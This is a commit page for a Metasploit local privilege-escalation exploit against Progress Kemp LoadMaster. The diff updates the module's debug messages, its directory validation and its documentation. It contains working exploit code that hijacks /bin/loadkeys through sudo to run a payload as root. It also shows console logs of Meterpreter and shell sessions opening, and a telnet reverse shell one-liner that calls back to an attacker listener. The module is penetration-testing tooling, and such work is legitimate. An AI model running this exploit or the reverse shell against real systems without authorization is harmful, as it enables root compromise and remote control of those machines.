Update debug statements and add protection against bad die name

rapid7 · May 10, 2024 · b28e263 · b28e263
1 parent 948b18b
commit b28e263
Show file tree

Hide file tree

Showing 2 changed files with 25 additions and 14 deletions.
diff --git a/...ation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md b/...ation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md
@@ -73,13 +73,13 @@ msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Found 3 indicators this is a KEMP product
 [!] The service is running, but could not be validated.
-[*] Execute dropper
-[*] Moving /bin/loadkeys to /tmp/.xcglzfitgpg
-[*] Moving /tmp/.feooibtpp to /bin/loadkeys
+[*] Writing payload to /tmp/.rypuliojtdch
+[*] Moving /bin/loadkeys to /tmp/.qyiojnfbnfc
+[*] Moving /tmp/.rypuliojtdch to /bin/loadkeys
 [*] Running /bin/loadkeys
-[+] Deleted /tmp/.feooibtpp
-[*] Meterpreter session 8 opened (10.5.135.201:4444 -> 10.5.134.141:28858) at 2024-05-03 12:05:12 -0500
-[*] Moving /tmp/.xcglzfitgpg to /bin/loadkeys
+[+] Deleted /tmp/.rypuliojtdch
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.141:28850) at 2024-05-10 08:50:39 -0500
+[*] Moving /tmp/.qyiojnfbnfc to /bin/loadkeys
 [+] /bin/loadkeys returned to original contents
 
 meterpreter > sysinfo
@@ -108,7 +108,7 @@ Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
    WRITABLE_DIR   /tmp             yes       A directory where we can write files
 
 
-Payload options (cmd/unix/reverse_awk):
+Payload options (cmd/unix/reverse):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
@@ -128,17 +128,27 @@ View the full module info with the info, or info -d command.
 
 msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
 
-[*] Started reverse TCP handler on 10.5.135.201:4444 
+[+] sh -c '(sleep 4376|telnet 10.5.135.201 4444|while : ; do sh && break; done 2>&1|telnet 10.5.135.201 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 10.5.135.201:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Found 3 indicators this is a KEMP product
 [!] The service is running, but could not be validated.
-[*] Execute command
-[*] Moving /bin/loadkeys to /tmp/.twqrvjasafa
+[*] Preparing payload command
+[*] Moving /bin/loadkeys to /tmp/.mnqdvfwutfd
 [*] Moving /bin/bash to /bin/loadkeys
 [*] Running payload command
-[*] Command shell session 7 opened (10.5.135.201:4444 -> 10.5.134.141:16589) at 2024-05-03 12:02:00 -0500
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo igZFhKRnh9GplIdu;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nigZFhKRnh9GplIdu\r\n"
 [*] 
-[*] Moving /tmp/.twqrvjasafa to /bin/loadkeys
+[*] Moving /tmp/.mnqdvfwutfd to /bin/loadkeys
+[*] Matching...
+[*] B is input...
 [+] /bin/loadkeys returned to original contents
 
 ls

diff --git a/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb b/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
@@ -108,7 +108,7 @@ def verify_copy(src, dest, elevate)
   end
 
   def execute_dropper(target_binary, binary_rename, temp_payload_path)
-    vprint_status('Execute dropper')
+    vprint_status("Writing payload to #{temp_payload_path}")
     write_file(temp_payload_path, generate_payload_exe)
     chmod(temp_payload_path)
     register_file_for_cleanup(temp_payload_path)
@@ -120,7 +120,7 @@ def execute_dropper(target_binary, binary_rename, temp_payload_path)
   end
 
   def execute_command(target_binary, binary_rename, cmd)
-    vprint_status('Execute command')
+    vprint_status('Preparing payload command')
     # save copy of target_binary
     return unless verify_copy(target_binary, binary_rename, false)
     return unless verify_copy('/bin/bash', target_binary, true)
@@ -134,6 +134,7 @@ def exploit
     if writable_dir.blank? || (writable_dir[-1] != '/')
       writable_dir += '/'
     end
+    fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir)
     target_binary = datastore['TARGET_BINARY']
     binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
     target_binary_hash = file_remote_digestmd5(target_binary)